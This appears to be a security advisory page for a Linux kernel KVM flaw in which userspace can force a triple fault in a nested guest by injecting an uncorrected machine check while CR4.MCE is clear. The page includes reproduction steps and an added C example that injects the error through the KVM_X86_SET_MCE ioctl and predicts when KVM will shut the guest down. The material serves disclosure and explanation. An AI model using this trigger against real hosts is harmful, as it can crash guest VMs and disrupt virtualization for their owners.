Linux kernel
cpe:2.3:a:linux:linux_kernel:*:*:*:*:*:*:*, +4 more
A vulnerability has been identified in the x86 KVM (Kernel-based Virtual Machine) code of the Linux kernel. KVM assumed that userspace cannot induce a triple fault in a nested guest (L2) except by going through KVM_RUN, where KVM handles such events itself. That assumption is wrong: while L2 is active and the guest's CR4.MCE bit is clear, userspace can inject a machine check into the vCPU, and because a #MC with CR4.MCE=0 is a shutdown condition KVM synthesizes a triple fault for L2 outside of KVM_RUN. A forthcoming change that preserves KVM_REQ_TRIPLE_FAULT across migration would give userspace a second way to reach the same state, making the issue easier to trigger.
Triggering this issue forces a triple fault in the nested guest (L2), which shuts that guest down; because the event reaches KVM by a path it did not account for, it can also disrupt the host-side virtualization state for the affected VM.
To reproduce, run a guest that has entered a nested guest (L2) with L2's CR4.MCE clear, then inject an uncorrected machine check into that vCPU from userspace while it is running. QEMU can do this from its monitor with the mce command, which forwards the injection to KVM through the KVM_X86_SET_MCE ioctl.
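The following is an added example written for this page, not code from the advisory or from the kernel. It shows the userspace side of the trigger described above: a helper that injects an uncorrected machine check through the real KVM_X86_SET_MCE ioctl (the same path QEMU's mce monitor command uses), and a predictor, modeled on the check KVM makes in kvm_vcpu_ioctl_x86_set_mce(), that tells you whether a given CR4/MCG_STATUS state will get a delivered #MC or a synthesized triple fault. The function names uc_mce_status, kvm_set_mce_outcome and inject_uc_mce are this example's own; the bit constants, the struct kvm_x86_mce layout and the ioctl number come from the x86 architecture and the kernel UAPI headers. The example does not build a nested guest: in the advisory's scenario vcpu_fd belongs to a vCPU that is currently executing L2, and the CR4 value that matters is L2's.

```c
/*
 * Added example (not part of the advisory or the kernel): inject an
 * uncorrected machine check into a KVM vCPU via KVM_X86_SET_MCE, and
 * predict whether KVM will deliver #MC or synthesize a triple fault.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#if defined(__linux__) && defined(__x86_64__)
#include <sys/ioctl.h>
#include <linux/kvm.h>
#endif

/* Architectural bits in IA32_MCi_STATUS, IA32_MCG_STATUS and CR4. */
#define MCI_STATUS_VAL  (1ULL << 63)   /* error information is valid   */
#define MCI_STATUS_UC   (1ULL << 61)   /* uncorrected error            */
#define MCI_STATUS_EN   (1ULL << 60)   /* error reporting enabled      */
#define MCG_STATUS_MCIP (1ULL << 2)    /* a #MC is already in progress */
#define X86_CR4_MCE     (1ULL << 6)    /* machine-check enable         */

enum mce_outcome {
    MCE_EINVAL       = -1,  /* KVM rejects the request with -EINVAL   */
    MCE_QUEUED       =  0,  /* KVM logs the error / queues #MC        */
    MCE_TRIPLE_FAULT =  1   /* KVM sets KVM_REQ_TRIPLE_FAULT instead  */
};

/* Status word for a valid, enabled, uncorrected machine check. */
static uint64_t uc_mce_status(void)
{
    return MCI_STATUS_VAL | MCI_STATUS_EN | MCI_STATUS_UC;
}

/*
 * Predictor modeled on kvm_vcpu_ioctl_x86_set_mce() in arch/x86/kvm/x86.c
 * (example code, not the kernel's). cr4 and mcg_status are the vCPU's
 * current register values, nbanks the bank count given to KVM_X86_SETUP_MCE.
 * Assumes the guest's MCG_CTL and per-bank MCi_CTL are all ones (QEMU's
 * default), so uncorrected errors are not silently dropped.
 */
static enum mce_outcome kvm_set_mce_outcome(uint64_t cr4, uint64_t mcg_status,
                                            uint64_t status, unsigned bank,
                                            unsigned nbanks)
{
    if (bank >= nbanks || !(status & MCI_STATUS_VAL))
        return MCE_EINVAL;
    if (!(status & MCI_STATUS_UC))
        return MCE_QUEUED;           /* corrected error: recorded only */
    /* An uncorrected error that cannot be delivered as #MC is fatal. */
    if ((mcg_status & MCG_STATUS_MCIP) || !(cr4 & X86_CR4_MCE))
        return MCE_TRIPLE_FAULT;     /* the CR4.MCE=0 case in the advisory */
    return MCE_QUEUED;               /* deliverable #MC is queued */
}

#if defined(__linux__) && defined(__x86_64__)
/*
 * Inject a UC machine check into vcpu_fd (a fd from KVM_CREATE_VCPU on
 * which the VMM has already run KVM_X86_SETUP_MCE). Returns 0 on success,
 * -1 if the ioctl fails. Whether KVM queues #MC or a triple fault depends
 * on the vCPU's CR4/MCG_STATUS exactly as kvm_set_mce_outcome() predicts.
 */
int inject_uc_mce(int vcpu_fd, uint8_t bank, uint64_t addr)
{
    struct kvm_x86_mce mce;
    memset(&mce, 0, sizeof(mce));
    mce.status     = uc_mce_status();
    mce.mcg_status = MCG_STATUS_MCIP;   /* state a real #MC would leave */
    mce.addr       = addr;
    mce.misc       = 0;
    mce.bank       = bank;
    return ioctl(vcpu_fd, KVM_X86_SET_MCE, &mce) < 0 ? -1 : 0;
}
#endif

int main(void)
{
    /* Constructed sample register states for the predictor. */
    uint64_t st = uc_mce_status();
    printf("CR4.MCE=0          -> %d (1 = triple fault)\n",
           kvm_set_mce_outcome(0, 0, st, 0, 10));
    printf("CR4.MCE=1          -> %d (0 = #MC queued)\n",
           kvm_set_mce_outcome(X86_CR4_MCE, 0, st, 0, 10));
    printf("CR4.MCE=1, MCIP=1  -> %d (1 = triple fault)\n",
           kvm_set_mce_outcome(X86_CR4_MCE, MCG_STATUS_MCIP, st, 0, 10));
    /* A harness that owns a vCPU currently executing L2 would now call
     * inject_uc_mce(vcpu_fd, 0, 0); no VM is created in this example. */
    return 0;
}
```

The predictor makes the advisory's precondition concrete: only the combination of an uncorrected error (MCI_STATUS_UC) with CR4.MCE clear, or with a #MC already in progress, turns the injection into KVM_REQ_TRIPLE_FAULT; a corrected error or a guest with CR4.MCE set takes the ordinary #MC path and never reaches the affected code.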